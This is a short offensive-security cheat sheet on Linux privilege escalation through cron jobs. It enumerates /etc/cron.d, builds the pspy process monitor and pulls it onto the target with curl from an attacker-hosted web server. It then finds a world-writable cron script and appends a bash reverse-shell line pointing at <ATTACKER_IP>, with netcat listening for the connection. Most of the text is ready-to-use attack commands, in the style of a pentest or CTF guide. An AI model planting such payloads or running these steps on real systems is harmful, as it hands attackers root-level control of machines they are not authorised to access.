PRIMARY CATEGORY → LINUX PRIVESC
Enumeration
Cron.d Directory
Typically a non-privileged user has read permissions over the existing CRON files within the /etc/cron.d directory
We should also always check whether the current user has write permissions on any of them
ls -l /etc/cron.dPSpy
Setup
From the Attacker ⚔️
- Cloning the Github Repository and Compiling the Go Binary
git clone https://github.com/dominicbreuker/pspy PSpycd !$ && go build -ldflags '-s -w' .
upx pspy- Transferring the binary to the target
From the Attacker ⚔️
python3 -m http.server 80From the Target 🎯
cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/pspy' --remote-nameUsage
chmod 700 pspy && ./pspy -pf -i 1000Abuse
World-Writable File
Let’s suppose that we have compromised an entire web application and stablished a connection to the target through a Reverse Shell
Then, we start enumerating the target in order to be able to privilege escalation and we find out an interesting backup.bash script that we have write permissions for
We have done this by issuing the following command, which search the system for files on which the current user has write permissions
find / -path '/proc' -prune -o -perm -0002 -type f 2> /dev/nullSince there is a script called backup.bash, there may be a Cron Job that runs it at regular intervals
Therefore, we could transfer a PSpy binary to the target in order to monitor new system processes
We can run it as follows →
./pspy -pf -i 1000After a while, we see that a Cron Job runs the backup.bash script and a TAR file is created within the /var/www/html directory
So, since we have write permissions over the given script, we can simply edit it and add the following payload at the end
bash -i &> /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1Then, we have to run the following command from the attacker machine in order to receive the incoming shell a.k.a Reverse Shell
nc -nlvp <PORT>